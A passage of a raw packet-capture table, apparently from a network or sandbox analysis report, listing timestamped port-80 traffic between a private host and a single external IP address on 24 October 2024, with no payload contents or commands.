Oct 24, 2024 13:02:06.845232010 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.845300913 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.845312119 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.845321894 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.845333099 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.845345974 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.845374107 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.846165895 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.846266031 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.847042084 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.847089052 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.847089052 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.847100019 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.847142935 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.847157955 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.847161055 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.847186089 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.847209930 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.882716894 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.882730007 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.882739067 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.882822037 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.921401024 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.921425104 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.921462059 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.921493053 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.962945938 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.962991953 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.963006973 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.963022947 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.963042974 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.963058949 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.963069916 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.963109016 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.963116884 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.963126898 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.963152885 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.963165998 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.963344097 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.963376999 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.963381052 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.963408947 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.963485956 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.963496923 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.963507891 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.963521957 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.963537931 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.963562012 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.963594913 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.963939905 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.963984013 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.964011908 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.964030027 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.964040995 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.964049101 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.964051008 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.964068890 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.964090109 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.964390993 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.964425087 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.964443922 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.964453936 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.964478016 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.964493036 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.964514017 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.964524984 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.964546919 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.964561939 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.966190100 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.966240883 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.966243029 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.966253042 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.966284990 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.966484070 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.966495991 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.966521978 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.966533899 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.001400948 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.001441002 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.001451015 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.001568079 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.040252924 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.040287018 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.040296078 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.040307045 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.040471077 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.040471077 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.082304955 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.082330942 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.082340956 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.082350969 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.082361937 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.082372904 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.082412004 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.082428932 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.082441092 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.082444906 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.082451105 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.082492113 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.082564116 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.082573891 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.082583904 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.082592964 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.082606077 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.082640886 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.083287954 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.083297968 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.083307981 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.083349943 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.083362103 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.083386898 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.083398104 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.083431005 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.083442926 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.083761930 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.083818913 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.083831072 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.083883047 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.085001945 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.085026026 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.085035086 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.085056067 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.085082054 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.085127115 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.085145950 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.085156918 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.085170031 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.085211039 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.120361090 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.120373964 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.120384932 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.120449066 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.120472908 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.159097910 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.159136057 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.159145117 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.159154892 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.159162045 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.159185886 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.159225941 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.200786114 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.200825930 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.200836897 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.200853109 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.200913906 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.200918913 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.200930119 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.200939894 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.200949907 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.200979948 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.201004982 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.201040030 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.201082945 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.201383114 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.201431036 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.201435089 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.201472044 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.201484919 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.201525927 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.201591015 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.201601028 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.201611996 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.201638937 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.201663017 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.201885939 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.201930046 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.201940060 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.201940060 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.201977968 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.202069044 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.202079058 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.202089071 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.202100039 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.202120066 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.202159882 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.202172995 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.202218056 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.202775002 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.202812910 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.202831030 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.202852964 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.204226017 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.204277992 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.204278946 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.204288960 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.204310894 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.204319000 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.204343081 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.204364061 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.239650965 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.239661932 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.239670992 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.239770889 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.277769089 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.277811050 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.277822971 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.277885914 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.277957916 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.319503069 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.319549084 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.319559097 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.319618940 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.319619894 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.319647074 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.319657087 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.319664955 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.319722891 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.319984913 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.319994926 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.320004940 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.320019960 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.320029020 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.320039988 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.320070028 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.320502043 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.320543051 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.320552111 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.320554972 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.320596933 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.320642948 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.320653915 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.320662975 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.320672989 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.320686102 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.320729017 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.320749998 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.320760012 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.320792913 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.320832968 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.321278095 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.321329117 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.321335077 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.321346998 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.321383953 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.321415901 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.321425915 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.321435928 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.321454048 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.321495056 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.322503090 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.322525978 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.322546005 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.322586060 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.322699070 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.322745085 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.322765112 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.322774887 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.322803974 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.322805882 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.322832108 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.322853088 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.357944965 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.357968092 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.357975960 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.357986927 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.358004093 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.358038902 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.396789074 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.396843910 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.396867037 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.396905899 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.396912098 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.396953106 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.438529015 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.438574076 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.438585997 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.438611984 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.438613892 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.438657999 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.438657999 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.438658953 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.438671112 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.438699961 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.438709021 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.438741922 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.438745975 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.438756943 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.438769102 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.438781023 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.438796997 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.438824892 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.438867092 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.438889027 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.438900948 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.438911915 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.438944101 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.438982964 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.439486980 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.439546108 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.439558983 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.439589024 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.439625978 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.439636946 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.439656019 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.439663887 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.439707041 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.439940929 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.439991951 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.439992905 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.440005064 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.440035105 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.440057993 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.440104008 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.440115929 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.440125942 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.440136909 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.440145016 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.440175056 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.440177917 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.440220118 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.440599918 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.440649033 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.440653086 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.440663099 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.440696001 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.440715075 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.441327095 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.441380024 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.441401958 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.441447973 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.441539049 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.441548109 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.441557884 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.441567898 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.441586018 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.441627026 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.477375031 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.477386951 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.477478981 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:07.515791893 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.515805006 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.515816927 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:07.515873909 CEST	49711	80	192.168.2.6	185.215.113.37
